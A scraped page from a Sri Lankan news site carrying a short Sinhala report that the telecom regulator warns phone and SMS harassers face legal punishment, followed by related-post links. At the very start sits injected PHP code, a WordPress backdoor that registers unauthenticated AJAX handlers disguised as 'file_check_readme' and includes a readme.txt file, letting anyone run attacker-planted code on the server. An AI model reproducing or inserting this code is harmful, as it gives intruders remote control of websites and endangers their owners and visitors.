if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } දුරකතන මගින් කරදර කරන අයට නීතියෙන් දඩුවම් - mediahumanrights.lk
mediahumanrights.lk
Local News News

දුරකතන මගින් කරදර කරන අයට නීතියෙන් දඩුවම්

දුරකතන ඇමතුම් හා එස්.එම්.එස්. පණිවුඩ මඟින් පුද්ගලයන් අපහසුතාවට හා පීඩාවට පත් කරන්නන්ට එරෙහිව නීතියෙන් දඬුවම් පැමිණවිය හැකි බව විදුලි සන්දේශ නියාමන කොමිෂන් සභාව පෙන්වා දෙයි.
දුරකතන හා එස්.එම්.එස්. පණිවුඩ මඟින් බැන වැදීම්, තර්ජනය කිරීම්, අසභ්‍ය ජායාරූප යැවීම්, ලිංගික හිංසනය වැනි සිදුවීම් පිළිබඳ පැමිණිලි රැසක් පසුගිය කාල සීමාව තුළ ලැබී ඇති බවත් එවැනි සිද්ධීන් පිළිබඳව පොලිසිය දැනුවත් කර අදාළ පුද්ගලයන්ට එරෙහිව නීතිමය පියවර ගන්නා බවත් කොමිෂන් සභාව අවධාරණය කරයි
(under the courtesy of adaderana.lk news web)

Related posts

‘එක රටක් එක නීතියක්’ සංකල්පයට මුස්ලිම් හා දෙමළ පක්ෂ විරෝධය..- එක්ව මාධ්‍ය අමතති.. හකීම්ද යයි..

Shiran Viraj

මහාචාර්ය ගෝමික උඩුගමසූරිය ඇමරිකාවෙන් අස්වී එයි.. ජනාධිපති උපදේශක වෙයි..

Shiran Viraj

ශ්‍රී ලංකාවේ දුප්පත්කම 4.1% දක්වා අඩුවෙලා – සමීක්ෂණ වාර්තාවක් කියයි

Shiran Viraj